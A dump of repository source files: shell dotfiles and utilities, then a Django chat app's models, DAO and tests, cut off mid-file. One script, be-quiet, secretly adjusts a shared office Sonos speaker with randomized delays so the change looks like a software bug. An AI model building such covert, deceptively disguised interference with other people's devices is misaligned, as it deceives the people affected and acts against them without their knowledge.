"blob_id": "b576a6c355f5c059c1780fc27dbde35994d8b8c2",
"content_id": "3812b075ccf3a4ed5b4d5288a67579881ed26b41",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 79,
"license_type": "permissive",
"max_line_length": 40,
"num_lines": 2,
"path": "/includes/lynx.sh",
"repo_name": "MartinHarding/chelys",
"src_encoding": "UTF-8",
"text": "export WWW_HOME=\"https://duckduckgo.com\"\nalias lynx=\"lynx -accept_all_cookies\"\n"
},
{
"alpha_fraction": 0.6296980977058411,
"alphanum_fraction": 0.6438694000244141,
"avg_line_length": 35.06666564941406,
"blob_id": "16815668f5aa772a77000a56b2146c6b83394a8d",
"content_id": "fe6b5594a78696f7efb32b3a44e4cdd20708ad7a",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 1623,
"license_type": "permissive",
"max_line_length": 119,
"num_lines": 45,
"path": "/bin/be-quiet",
"repo_name": "MartinHarding/chelys",
"src_encoding": "UTF-8",
"text": "#!/bin/zsh\n\n# Changes the volume of Sonos to a specific level (default 0) over a period of time, because playing music in an open\n# office is rude. Randomizes the delay to make it seem like a network error or software bug. Note: you can also have it\n# slowly increment up to a certain volume, which can be useful for sabatoging music playing privilege.\n\nbe_quiet() {\n local target_volume=${1:-0}\n local current_volume=100\n local min_delay=${2:-60}\n while true; do\n local zone=`sonos-cli list-zones | head -n1`\n [ $? -ne 0 ] && continue\n current_volume=`sonos-cli volume --zone $zone`\n [ $? -ne 0 ] && continue\n echo \"`be_quiet_timestamp`: Current volume is $current_volume in zone $zone\"\n local volume_delta=$(($current_volume - $target_volume))\n local volume_adjustment=`be_quiet_clamp_value $(( $volume_delta / 5 )) -5 5`\n local new_volume=$(($current_volume - $volume_adjustment))\n local random=$(( RANDOM % 1000 ))\n local delay=$(($min_delay + $random))\n if [[ $current_volume -ne $target_volume ]]; then\n echo \"`be_quiet_timestamp`: Setting volume to $new_volume in zone $zone\"\n sonos-cli volume $new_volume --zone $zone\n [ $? -ne 0 ] && continue\n else\n echo \"`be_quiet_timestamp`: Volume is at target of $target_volume in zone $zone\"\n fi\n echo \"`be_quiet_timestamp`: Waiting $delay seconds\"\n sleep $delay\n done\n}\n\nbe_quiet_timestamp() {\n date -u +\"%Y-%m-%dT%H:%M:%SZ\"\n}\n\nbe_quiet_clamp_value() {\n local value=$1 min=$2 max=$3\n value=$(( $value < $min ? $min : $value ))\n value=$(( $value > $max ? $max : $value ))\n echo $value\n}\n\nbe_quiet $@\n"
},
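The volume logic above is a clamped proportional step: move a fifth of the remaining distance, capped at ±5 per iteration. The same arithmetic in Python (int() truncates toward zero like shell arithmetic), which also makes a quirk visible: once the gap drops below 5 the step truncates to 0, so the loop hovers just above the target.

```python
def clamp(value, lo, hi):
    """be_quiet_clamp_value: pin value to the range [lo, hi]."""
    return max(lo, min(hi, value))

def next_volume(current, target):
    """One adjustment step: at most 5 units toward the target per iteration."""
    return current - clamp(int((current - target) / 5), -5, 5)

# next_volume(100, 0) -> 95; next_volume(12, 0) -> 10
# next_volume(3, 0)   -> 3, i.e. a gap under 5 never closes completely
```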
{
"alpha_fraction": 0.5795148015022278,
"alphanum_fraction": 0.6307277679443359,
"avg_line_length": 25.5,
"blob_id": "e8dfb96fdc61868db44b2d7a164921d819488324",
"content_id": "6c30209c5d299691e4781e4ecfd1ab0e409c7a30",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 371,
"license_type": "permissive",
"max_line_length": 78,
"num_lines": 14,
"path": "/bin/strtotime",
"repo_name": "MartinHarding/chelys",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n\nimport sys\nimport time\nfrom datetime import datetime\nfrom dateutil import tz\n\n# [25/Jan/2018:03:54:40-0500]\nif len(sys.argv) > 1:\n time_string = sys.argv[1].replace('[', '').replace(']', '').split(' -')[0]\n d = datetime.strptime(time_string, '%d/%b/%Y:%H:%M:%S')\n print(int(d.timestamp()))\nelse:\n print('Must pass a valid time string')\n"
},
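strtotime drops the UTC offset before parsing, so the result is interpreted in the machine's local zone. Python's %z directive can keep the offset instead; a sketch, assuming the bracketed access-log format from the script's comment:

```python
from datetime import datetime

def strtotime(s):
    """Parse '[25/Jan/2018:03:54:40 -0500]' to a unix timestamp, keeping the offset."""
    d = datetime.strptime(s.strip("[]"), "%d/%b/%Y:%H:%M:%S %z")
    return int(d.timestamp())

# strtotime("[25/Jan/2018:03:54:40 -0500]")  # -> 1516870480
```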
{
"alpha_fraction": 0.4798828065395355,
"alphanum_fraction": 0.49335938692092896,
"avg_line_length": 33.328857421875,
"blob_id": "505d8f7c1e1db051221ffa9d35e5823fb6ab097a",
"content_id": "03f99745223aca8c93fcbe17ff2c8b243cfa7ed0",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 5120,
"license_type": "permissive",
"max_line_length": 121,
"num_lines": 149,
"path": "/bin/hay",
"repo_name": "MartinHarding/chelys",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env bash\n\n# Setup hay directory and hay bail path\nHAYDIR=$HOME/.hay\n! [ -d $HAYDIR ] && mkdir -p $HAYDIR\n! [ -f $$HAYDIR/config ] && touch $HAYDIR/config\nsource $HAYDIR/config\nif ! [[ \"$HAYBAIL\" ]]; then\n read -p \"Enter path for haybail.txt file: \" HAYBAIL\n echo \"export HAYBAIL=${HAYBAIL:-$HOME/haybail.txt}\" >> $HAYDIR/config\n source $HAYDIR/config\nfi\nHAYBAILDIR=`dirname $HAYBAIL`\n! [ -d $HAYBAILDIR ] && echo \"$HAYBAILDIR does not exist\" && exit 1\n! [ -f $HAYBAIL ] && touch $HAYBAIL\n\n# Get last line of haybail\n__last_line=`wc -l < $HAYBAIL | xargs`\n\nconfirm() {\n [[ $_auto_yes ]] && return 1\n [[ $_silent ]] && return 0\n # example: confirm \"Do the thing?\" && [ \"$?\" == 0 ] && exit 1\n while true; do\n read -r -p \"${1:-Are you sure?} [y/n]: \" RESP\n case $RESP in\n [yY][eE][sS]|[yY]) return 1;;\n [nN][oO]|[nN]) return 0;;\n *) echo \"Please enter y(es) or n(o)\";;\n esac\n done\n}\n\nif [[ \"$1\" ]]; then\n _CMD=\"$1\" && shift\nelse\n _CMD=\"list\"\nfi\ncase $_CMD in\n # 't'|'today' )\n # hay list `date +%Y-%m-%d`\n # ;;\n 'ls'|'list' )\n if ! [[ \"$@\" ]]; then\n cat -n $HAYBAIL\n else\n __results=`grep -in --color=always \"$@\" $HAYBAIL`\n ! [[ \"$__results\" ]] && echo \"No results found for '$@' in $HAYBAIL\" && exit 0\n echo \"$__results\" | sed 's/:/ /;' | awk '{printf \"%6s\",$1; $1=\" \"; print $0}'\n fi\n ;;\n 'l'|'last' )\n echo \"$(printf '%6s' `wc -l < $HAYBAIL`) `tail -n1 $HAYBAIL`\"\n ;;\n 's'|'start' )\n __start=\"start:`date +%s`\"\n if [[ \"$@\" ]]; then\n __HAY=\"$@ \"\n else\n read -p \"Hay started: \" __HAY\n __HAY=\"`echo $__HAY | sed -e 's/\\n//g'`\"\n [[ \"$__HAY\" ]] && __HAY=\"$__HAY \" # Add a space to the end if not empty\n confirm \"End hay now?\" && [ \"$?\" == 0 ] && __end=\" end:`date +%s`\"\n fi\n echo \"$__HAY$__start$__end\" >> $HAYBAIL\n ;;\n 'e'|'end' )\n if [[ $1 =~ ^[0-9]+$ ]]; then\n if [[ $1 -lt $__last_line ]]; then\n __line_num=$1\n else\n echo \"Cannot edit line $1 of $HAYBAIL because it is only $__last_line lines long\" && exit 1\n fi\n elif [[ \"$1\" ]]; then\n echo \"Enter a whole integer to edit a specific line\" && exit 1\n else\n __line_num=$__last_line\n fi\n __line=`sed \"$__line_num\"\"q;d\" $HAYBAIL`\n if [[ \"$__line\" == *'end:'* ]]; then\n __ended=$(date -r `echo $__line | grep -o end:.* | cut -d \\: -f 2` +%Y-%m-%d\\ at\\ %H:%M\\ %p)\n echo \"Line $__line_num was already ended on $__ended\" && exit 1\n fi\n __new=\"$__line end:`date +%s`\"\n __new_escaped=$(echo $__new | sed -e 's/\\\\/\\\\\\\\/g; s/\\//\\\\\\//g; s/&/\\\\\\&/g')\n sed -i.tmp \"$__line_num\"\"s/.*/$__new_escaped/\" $HAYBAIL\n echo -e \"Edited $HAYBAIL:$__line_num\\n\\x1B[31m- $__line\\n\\x1B[32m+ $__new\\x1B[0m\"\n ;;\n 'c'|'contexts' )\n __contexts=`grep -on '@[a-zA-Z0-9_]*' $HAYBAIL`\n __contexts_counts=`echo \"$__contexts\" | cut -d \\: -f 2 | sort | uniq -c | awk '{print $2\":\"$1}'`\n for __context in $__contexts_counts; do\n __mentions=$(echo \"$__contexts\" | grep \"`echo $__context | cut -d \\: -f 1`\" | cut -d \\: -f1 | tr '\\n' ',')\n echo \"$__context ($__mentions)\" | sed 's/,)/) /g'\n done\n ;;\n 'p'|'projects' )\n __projects=`grep -on '+[a-zA-Z0-9_]*' $HAYBAIL`\n __projects_counts=`echo \"$__projects\" | cut -d \\: -f 2 | sort | uniq -c | awk '{print $2\":\"$1}'`\n for __tag in $__projects_counts; do\n __mentions=$(echo \"$__projects\" | grep \"`echo $__tag | cut -d \\: -f 1`\" | cut -d \\: -f1 | tr '\\n' ',')\n echo \"$__tag ($__mentions)\" | sed 's/,)/) /g'\n done\n ;;\n 'archive' )\n if [[ $@ == 
*'list'* ]] || [[ $@ == *'ls'* ]]; then\n find `dirname $HAYBAIL/` -name *\"$(basename `echo $HAYBAIL | sed 's/\\.txt//g'`)-\"* -maxdepth 1\n else\n __archive_name=\"`echo $HAYBAIL | sed 's/\\.txt//g'`-`date +%s`.txt\"\n mv $HAYBAIL \"$__archive_name\"\n echo \"Archived $HAYBAIL to $__archive_name\"\n fi\n ;;\n 'e'|'edit' )\n if [[ $1 =~ ^[0-9]+$ ]]; then\n if [[ $1 -lt $__last_line ]]; then\n __line_num=$1\n else\n echo \"Cannot edit line $1 of $HAYBAIL because it is only $__last_line lines long\" && exit 1\n fi\n elif [[ \"$1\" ]]; then\n echo \"Enter a whole integer to edit a specific line\" && exit 1\n else\n __line_num=$__last_line # Default to editing last line\n fi\n __line=`sed \"$__line_num\"\"q;d\" $HAYBAIL`\n\n # Experimental inline editor using Python\n # __new=`python -c \"import readline; readline.set_startup_hook(lambda: readline.insert_text('$__line')); input('');\"`\n\n # Good old nano\n __tmp_file=`mktemp`\n echo \"$__line\" > $__tmp_file\n nano $__tmp_file\n __new=`cat $__tmp_file | sed -e 's/\\n//g' | tr -d '\\n'`\n\n # Save new line to $HAYBAIL\n if [[ \"$__new\" == \"$__line\" ]]; then\n echo \"Nothing to save (no changes made to $__line)\"\n else\n __new_escaped=$(echo $__new | sed -e 's/\\\\/\\\\\\\\/g; s/\\//\\\\\\//g; s/&/\\\\\\&/g')\n sed -i.tmp \"$__line_num\"\"s/.*/$__new_escaped/\" $HAYBAIL\n echo -e \"Edited $HAYBAIL:$__line_num\\n\\x1B[31m- $__line\\n\\x1B[32m+ $__new\\x1B[0m\"\n fi\n ;;\n * )\n echo \"HELP\"\n ;;\nesac\n\n\n\n\n\n"
},
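Both the 'end' and 'edit' branches above rewrite line N of the haybail with `sed -i "Ns/.*/.../"`, which is why the script needs the `__new_escaped` dance. A Python sketch of the same in-place line replacement with no escaping concerns (the file name and arguments in the usage line are illustrative):

```python
def replace_line(path, line_num, new_text):
    """Replace 1-indexed line `line_num` of `path`, like hay's sed -i edit."""
    with open(path) as f:
        lines = f.readlines()
    old = lines[line_num - 1].rstrip("\n")
    lines[line_num - 1] = new_text + "\n"
    with open(path, "w") as f:
        f.writelines(lines)
    return old

# old = replace_line("haybail.txt", 3, "fix the roof @home end:1700000000")
```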
{
"alpha_fraction": 0.6120448112487793,
"alphanum_fraction": 0.6484593749046326,
"avg_line_length": 24.5,
"blob_id": "344ddb70c9f2fe5a3c12dd1dcd35883fd0bbcfc5",
"content_id": "1645f518fb48a5665ff12579d2def1f84865acc1",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 714,
"license_type": "permissive",
"max_line_length": 93,
"num_lines": 28,
"path": "/bin/work",
"repo_name": "MartinHarding/chelys",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env bash\n\n# This script helps you do hackerish stuff\n# Source: https://gist.github.com/timfallmk/32dca5c7f2a9eef8a34e4d1e7873ef30\n\nif [ \"$EUID\" -ne 0 ]\nthen\n echo \"Please run as root to be hackerish.\"\n exit\nfi\n\n# turn off globbing\nset -f\n# split on newlines only for for loops\nIFS='\n'\nfor log in $(find /var/log -type f); do\n # only use the log if it's a text file; we _will_ encounter some archived logs\n if [ `file $log | grep -e text | wc -l` -ne 0 ]\n then\n echo $log\n for line in $(cat $log); do\n echo $line\n # sleep for a random duration between 0 and 1/4 seconds to indicate hard hackerish work\n bc -l <<< $(bc <<< \"$RANDOM % 10\")\" / 40\" | xargs sleep\n done\n fi\ndone\n"
}
] | 31 |
lao605/zzc
|
https://github.com/lao605/zzc
|
406055c532382c196b940713fbdf17dfc940e8fa
|
611fade994d8c36a202c822a3e09468c317f2630
|
16fd54fec8011535c01ebd7f8532dbbf525ddc0f
|
HEAD
| 2016-08-03T17:22:52.668685 | 2015-12-13T08:43:55 | 2015-12-13T08:43:55 | 25,157,504 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7004525065422058,
"alphanum_fraction": 0.7085973024368286,
"avg_line_length": 20.66666603088379,
"blob_id": "54f8f54cf1a70a3a66a2d5e0bf484d80bb0d8d6d",
"content_id": "a490c5a90689a5b2c2a2679dab334364a6fd0520",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1105,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 51,
"path": "/zzc/adam2014/DAO/UserDAO.py",
"repo_name": "lao605/zzc",
"src_encoding": "UTF-8",
"text": "__author__ = 'CF'\n# -*- coding: utf-8 -*-\n\n\nimport os\nos.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"zzc.settings\")\n\nimport django\ndjango.setup()\n\nfrom adam2014.models import User\n\nimport datetime\n\ndef insertUser(**user):\n u = User.objects.create(**user)\n return u;\n\ndef deleteUser(id):\n User.objects.get(id=id).delete()\n\ndef getUserById(id):\n return User.objects.get(id=id)\n\ndef getUserByCode(code):\n return User.objects.get(code=code)\n\ndef getUserByPhone(phone):\n return User.objects.get(phone=phone)\n\ndef updateUser(**kw):\n User.objects.filter(id=kw['id']).update(**kw)\n\ndef validateUserByPhone(phone,password):\n\tresult = User.objects.filter(phone=phone,password=password)\n\treturn (len(result) == 1)\n\ndef validateUserByCode(code,password):\n\tresult = User.objects.filter(code=code,password=password)\n\treturn (len(result) == 1)\n\ndef validateVersion(version):\n\tpass\n\ndef validateExistPhone(phone):\n result = User.objects.filter(phone=phone)\n return (len(result) == 1)\n\ndef validateExistCode(code):\n result = User.objects.filter(code=code)\n return (len(result) == 1)\n"
},
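UserDAO is a thin wrapper over the Django ORM: create(), get(), filter().update() and delete(). A short usage sketch, assuming a configured test database; the field values follow the fixtures used elsewhere in this repo:

```python
from adam2014.DAO import UserDAO

u = UserDAO.insertUser(password="7654321", nickname="frank",
                       photo="this is a photo", phone="13570517278",
                       code="111111111")
UserDAO.updateUser(id=u.id, nickname="frank2")  # filter(id=...).update(**kw)
assert UserDAO.getUserByPhone("13570517278").nickname == "frank2"
assert UserDAO.validateUserByCode("111111111", "7654321")
UserDAO.deleteUser(u.id)
```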
{
"alpha_fraction": 0.5602098703384399,
"alphanum_fraction": 0.5624231696128845,
"avg_line_length": 32.33333206176758,
"blob_id": "b980e0ea80ff5ccc33b86839e98b96c2ca52fb0d",
"content_id": "c167ecfd53aa019faa999283f1f31c00efc45a6f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 12211,
"license_type": "no_license",
"max_line_length": 125,
"num_lines": 366,
"path": "/zzc/adam2014/models.py",
"repo_name": "lao605/zzc",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\nfrom django.db.models.fields import files\nfrom django.db import models\nimport datetime\n\n# Create your models here.\nclass User(models.Model):\n password = models.CharField(max_length=16)\n nickname = models.CharField(max_length=32)\n #定义photo存储路径\n photo = models.FileField(upload_to = './static/upload/photo/')\n phone = models.CharField(max_length=16)\n contacts_version = models.CharField(max_length=15,null=True)\n longitude = models.DecimalField(max_digits=8, decimal_places=5,null=True)\n latitude = models.DecimalField(max_digits=8, decimal_places=5,null=True)\n code = models.CharField(max_length=20)\n\n def __unicode__(self):\n return str(self.id)+' '+self.nickname +' '+self.code+' '+self.phone+' '+str(self.contacts_version)\\\n +' '+str(self.longitude)+' '+str(self.latitude)\n\n def toDict(self):\n fields = []\n for field in self._meta.fields:\n fields.append(field.name)\n\n d = {}\n for attr in fields:\n if isinstance(getattr(self, attr),datetime.datetime):\n d[attr] = getattr(self, attr).strftime('%Y-%m-%d %H:%M:%S')\n elif isinstance(getattr(self, attr),datetime.date):\n d[attr] = getattr(self, attr).strftime('%Y-%m-%d')\n else:\n d[attr] = getattr(self, attr)\n\n # import json\n # return json.dumps(d)\n return d\n\n\n\nclass Group(models.Model):\n name = models.CharField(max_length=32)\n ucount = models.IntegerField()\n code = models.CharField(max_length=20)\n users = models.ManyToManyField(User,through='GroupRelation')\n creater_id = models.IntegerField(null=True)\n\n def __unicode__(self):\n return str(self.id)+' '+self.name+' '+self.code+' '+str(self.ucount)+' '+str(self.creater_id)\n\n def toDict(self):\n fields = []\n for field in self._meta.fields:\n fields.append(field.name)\n\n d = {}\n for attr in fields:\n if isinstance(getattr(self, attr),datetime.datetime):\n d[attr] = getattr(self, attr).strftime('%Y-%m-%d %H:%M:%S')\n elif isinstance(getattr(self, attr),datetime.date):\n d[attr] = getattr(self, attr).strftime('%Y-%m-%d')\n else:\n d[attr] = getattr(self, attr)\n\n # import json\n # return json.dumps(d)\n return d\n\nclass Message(models.Model):\n time = models.DateTimeField(default=datetime.datetime.now())\n type = models.IntegerField()\n content_id = models.IntegerField()\n\n def __unicode__(self):\n return str(self.id)+' '+str(self.type) +' '+str(self.content_id)+' '+str(self.time)\n\n def toDict(self):\n fields = []\n for field in self._meta.fields:\n fields.append(field.name)\n\n d = {}\n for attr in fields:\n if isinstance(getattr(self, attr),datetime.datetime):\n d[attr] = getattr(self, attr).strftime('%Y-%m-%d %H:%M:%S')\n elif isinstance(getattr(self, attr),datetime.date):\n d[attr] = getattr(self, attr).strftime('%Y-%m-%d')\n else:\n d[attr] = getattr(self, attr)\n\n # import json\n # return json.dumps(d)\n return d\n\n\nclass TextMessage(models.Model):\n message = models.ForeignKey(Message,null=True)\n content = models.TextField()\n\n def __unicode__(self):\n return str(self.id)+' '+str(self.message_id)+' '+str(self.content)\n\n def toDict(self):\n fields = []\n for field in self._meta.fields:\n fields.append(field.name)\n\n d = {}\n for attr in fields:\n if isinstance(getattr(self, attr),datetime.datetime):\n d[attr] = getattr(self, attr).strftime('%Y-%m-%d %H:%M:%S')\n elif isinstance(getattr(self, attr),datetime.date):\n d[attr] = getattr(self, attr).strftime('%Y-%m-%d')\n else:\n d[attr] = getattr(self, attr)\n\n # import json\n # return json.dumps(d)\n return d\n\n\nclass PictureMessage(models.Model):\n message = 
models.ForeignKey(Message,null=True)\n content = models.TextField()\n\n def __unicode__(self):\n return str(self.id)+' '+str(self.message_id)+' '+str(self.content)\n\n def toDict(self):\n fields = []\n for field in self._meta.fields:\n fields.append(field.name)\n\n d = {}\n for attr in fields:\n if isinstance(getattr(self, attr),datetime.datetime):\n d[attr] = getattr(self, attr).strftime('%Y-%m-%d %H:%M:%S')\n elif isinstance(getattr(self, attr),datetime.date):\n d[attr] = getattr(self, attr).strftime('%Y-%m-%d')\n else:\n d[attr] = getattr(self, attr)\n\n # import json\n # return json.dumps(d)\n return d\n\n\nclass VoiceMessage(models.Model):\n message = models.ForeignKey(Message,null=True)\n content = models.TextField()\n\n def __unicode__(self):\n return str(self.id)+' '+str(self.message_id)+' '+str(self.content)\n\n def toDict(self):\n fields = []\n for field in self._meta.fields:\n fields.append(field.name)\n\n d = {}\n for attr in fields:\n if isinstance(getattr(self, attr),datetime.datetime):\n d[attr] = getattr(self, attr).strftime('%Y-%m-%d %H:%M:%S')\n elif isinstance(getattr(self, attr),datetime.date):\n d[attr] = getattr(self, attr).strftime('%Y-%m-%d')\n else:\n d[attr] = getattr(self, attr)\n\n # import json\n # return json.dumps(d)\n return d\n\nclass LocationMessage(models.Model):\n message = models.ForeignKey(Message,null=True)\n content = models.TextField()\n\n def __unicode__(self):\n return str(self.id)+' '+str(self.message_id)+' '+str(self.content)\n\n def toDict(self):\n fields = []\n for field in self._meta.fields:\n fields.append(field.name)\n\n d = {}\n for attr in fields:\n if isinstance(getattr(self, attr),datetime.datetime):\n d[attr] = getattr(self, attr).strftime('%Y-%m-%d %H:%M:%S')\n elif isinstance(getattr(self, attr),datetime.date):\n d[attr] = getattr(self, attr).strftime('%Y-%m-%d')\n else:\n d[attr] = getattr(self, attr)\n\n # import json\n # return json.dumps(d)\n return d\n\nclass BottlePicture(models.Model):\n usedTimes = models.IntegerField()\n tookTime = models.DateTimeField()\n user = models.ForeignKey(User,null=True)\n author = models.CharField(max_length=32,null=True)\n content = models.TextField()\n longitude = models.DecimalField(max_digits=8, decimal_places=5,null=True)\n latitude = models.DecimalField(max_digits=8, decimal_places=5,null=True)\n\n def __unicode__(self):\n return str(self.id)+' '+self.author +' '+str(self.tookTime)+' '\\\n +str(self.usedTimes)+' '+str(self.latitude)+' '+str(self.longitude)\n\n def toDict(self):\n fields = []\n for field in self._meta.fields:\n fields.append(field.name)\n\n d = {}\n for attr in fields:\n if isinstance(getattr(self, attr),datetime.datetime):\n d[attr] = getattr(self, attr).strftime('%Y-%m-%d %H:%M:%S')\n elif isinstance(getattr(self, attr),datetime.date):\n d[attr] = getattr(self, attr).strftime('%Y-%m-%d')\n else:\n d[attr] = getattr(self, attr)\n\n # import json\n # return json.dumps(d)\n return d\n\nclass ImmediatelyMessage(models.Model):\n user_from = models.ForeignKey(User)\n message = models.ForeignKey(Message)\n user_to_id = models.IntegerField()\n time = models.DateTimeField()\n\n def __unicode__(self):\n return str(self.id)+' '+str(self.user_from_id) +' '\\\n +str(self.user_to_id)+' '+str(self.message_id)+' '+str(self.time)\n\n def toDict(self):\n fields = []\n for field in self._meta.fields:\n fields.append(field.name)\n\n d = {}\n for attr in fields:\n if isinstance(getattr(self, attr),datetime.datetime):\n d[attr] = getattr(self, attr).strftime('%Y-%m-%d %H:%M:%S')\n elif 
isinstance(getattr(self, attr),datetime.date):\n d[attr] = getattr(self, attr).strftime('%Y-%m-%d')\n else:\n d[attr] = getattr(self, attr)\n\n # import json\n # return json.dumps(d)\n return d\n\nclass AddFriend(models.Model):\n user_from = models.ForeignKey(User)\n user_to_id = models.IntegerField()\n time = models.DateTimeField()\n\n def __unicode__(self):\n return str(self.id)+' '+str(self.user_from_id) +' '+str(self.user_to_id)+' '+str(self.time)\n\n def toDict(self):\n fields = []\n for field in self._meta.fields:\n fields.append(field.name)\n\n d = {}\n for attr in fields:\n if isinstance(getattr(self, attr),datetime.datetime):\n d[attr] = getattr(self, attr).strftime('%Y-%m-%d %H:%M:%S')\n elif isinstance(getattr(self, attr),datetime.date):\n d[attr] = getattr(self, attr).strftime('%Y-%m-%d')\n else:\n d[attr] = getattr(self, attr)\n\n # import json\n # return json.dumps(d)\n return d\n\n\nclass FriendRelation(models.Model):\n user_from = models.ForeignKey(User)\n user_to_id = models.IntegerField()\n time = models.DateTimeField()\n inBlackList = models.BooleanField(default=None)\n remark = models.CharField(max_length=16)\n top = models.BooleanField(default=None)\n\n def __unicode__(self):\n return str(self.id)+' '+str(self.user_from_id) +' '\\\n +str(self.user_to_id)+' '+str(self.time)+' '+str(self.inBlackList)+' '+self.remark+' '+str(self.top)\n\n def toDict(self):\n fields = []\n for field in self._meta.fields:\n fields.append(field.name)\n\n d = {}\n for attr in fields:\n if isinstance(getattr(self, attr),datetime.datetime):\n d[attr] = getattr(self, attr).strftime('%Y-%m-%d %H:%M:%S')\n elif isinstance(getattr(self, attr),datetime.date):\n d[attr] = getattr(self, attr).strftime('%Y-%m-%d')\n else:\n d[attr] = getattr(self, attr)\n\n # import json\n # return json.dumps(d)\n return d\n\nclass GroupRelation(models.Model):\n user = models.ForeignKey(User)\n group = models.ForeignKey(Group)\n time = models.DateTimeField()\n\n def __unicode__(self):\n return str(self.id)+' '+str(self.user_id) +' '+str(self.group_id)+' '+str(self.time)\n\n def toDict(self):\n fields = []\n for field in self._meta.fields:\n fields.append(field.name)\n\n d = {}\n for attr in fields:\n if isinstance(getattr(self, attr),datetime.datetime):\n d[attr] = getattr(self, attr).strftime('%Y-%m-%d %H:%M:%S')\n elif isinstance(getattr(self, attr),datetime.date):\n d[attr] = getattr(self, attr).strftime('%Y-%m-%d')\n else:\n d[attr] = getattr(self, attr)\n\n # import json\n # return json.dumps(d)\n return d\n\nclass GroupMessage(models.Model):\n user_from = models.ForeignKey(User)\n message = models.ForeignKey(Message)\n group_to = models.ForeignKey(Group)\n time = models.DateTimeField()\n\n def __unicode__(self):\n return str(self.id)+' '+str(self.user_from_id) +' '+str(self.group_to_id)+' '+str(self.time)+' '+str(self.message_id)\n\n def toDict(self):\n fields = []\n for field in self._meta.fields:\n fields.append(field.name)\n\n d = {}\n for attr in fields:\n if isinstance(getattr(self, attr),datetime.datetime):\n d[attr] = getattr(self, attr).strftime('%Y-%m-%d %H:%M:%S')\n elif isinstance(getattr(self, attr),datetime.date):\n d[attr] = getattr(self, attr).strftime('%Y-%m-%d')\n else:\n d[attr] = getattr(self, attr)\n\n # import json\n # return json.dumps(d)\n return d"
},
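Every model above carries an identical toDict() that string-formats dates; the datetime check must come before the date check because datetime.datetime is a subclass of datetime.date. A sketch of the shared mixin the repetition could be factored into (ToDictMixin is a name introduced here, not in the source):

```python
import datetime

class ToDictMixin(object):
    """The toDict() repeated on every model above, written once."""
    def toDict(self):
        d = {}
        for field in self._meta.fields:
            value = getattr(self, field.name)
            if isinstance(value, datetime.datetime):   # check datetime first
                d[field.name] = value.strftime('%Y-%m-%d %H:%M:%S')
            elif isinstance(value, datetime.date):
                d[field.name] = value.strftime('%Y-%m-%d')
            else:
                d[field.name] = value
        return d

# class User(ToDictMixin, models.Model): ...
```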
{
"alpha_fraction": 0.5784178972244263,
"alphanum_fraction": 0.6172839403152466,
"avg_line_length": 52.34146499633789,
"blob_id": "b157ab2a7c0a617f2bc56b0bb6f6959b9a59321c",
"content_id": "89e5dfc5c6dd152a0dbf00474dda04836c4c8894",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4374,
"license_type": "no_license",
"max_line_length": 127,
"num_lines": 82,
"path": "/zzc/adam2014/AllTest/DAOTest/testFriendRelationDAO.py",
"repo_name": "lao605/zzc",
"src_encoding": "UTF-8",
"text": "__author__ = 'CF'\n# -*- coding: utf-8 -*-\n\nfrom django.test import TestCase\nfrom adam2014.DAO.FriendRelationDAO import *\nfrom adam2014.models import FriendRelation\nfrom adam2014.models import User\nimport datetime\n\n\nclass FriendRelationTest(TestCase):\n def setUp(self):\n self.user1 = {\"id\":1,\"password\":\"7654321\",\"nickname\":\"frank\",\"photo\":\"this is a photo\",\"phone\":\"13570517278\",\n \"contacts_version\":\"1.0\",\"longitude\":\"1.23\",\"latitude\":\"23.45\",\"code\":\"111111111\"}\n self.user2 = {\"id\":2,\"password\":\"1234567\",\"nickname\":\"frank2\",\"photo\":\"this is a photo\",\"phone\":\"13570517279\",\n \"contacts_version\":\"1.0\",\"longitude\":\"1.23\",\"latitude\":\"23.45\",\"code\":\"111111112\"}\n self.user3 = {\"id\":3,\"password\":\"7654321\",\"nickname\":\"frank\",\"photo\":\"this is a photo\",\"phone\":\"13570517278\",\n \"contacts_version\":\"1.0\",\"longitude\":\"1.23\",\"latitude\":\"23.45\",\"code\":\"111111111\"}\n self.user4 = {\"id\":4,\"password\":\"7654321\",\"nickname\":\"frank\",\"photo\":\"this is a photo\",\"phone\":\"13570517278\",\n \"contacts_version\":\"1.0\",\"longitude\":\"1.23\",\"latitude\":\"23.45\",\"code\":\"111111111\"}\n self.time = datetime.datetime.now()\n self.inBlackList = False;\n self.top = False;\n\n User.objects.create(**self.user1)\n User.objects.create(**self.user2)\n User.objects.create(**self.user3)\n User.objects.create(**self.user4)\n\n\n self.friendRelation1 = {\"id\":1,\"user_from_id\":1,\"user_to_id\":2,\"time\":str(self.time),\"remark\":\"God Kun\",\n \"inBlackList\":self.inBlackList,\"top\":self.top}\n self.friendRelation2 = {\"id\":2,\"user_from_id\":2,\"user_to_id\":1,\"time\":str(self.time),\"remark\":\"God Kun\",\n \"inBlackList\":self.inBlackList,\"top\":self.top}\n self.friendRelation3 = {\"id\":3,\"user_from_id\":2,\"user_to_id\":3,\"time\":str(self.time),\"remark\":\"God Kun\",\n \"inBlackList\":self.inBlackList,\"top\":self.top}\n self.friendRelation4 = {\"id\":4,\"user_from_id\":3,\"user_to_id\":2,\"time\":str(self.time),\"remark\":\"God Kun\",\n \"inBlackList\":self.inBlackList,\"top\":self.top}\n\n FriendRelation.objects.create(**self.friendRelation1)\n FriendRelation.objects.create(**self.friendRelation2)\n FriendRelation.objects.create(**self.friendRelation3)\n FriendRelation.objects.create(**self.friendRelation4)\n\n def testInsertFriendRelation(self):\n user_from_id = self.user1['id']\n user_to_id = self.user4['id']\n friendRelation = 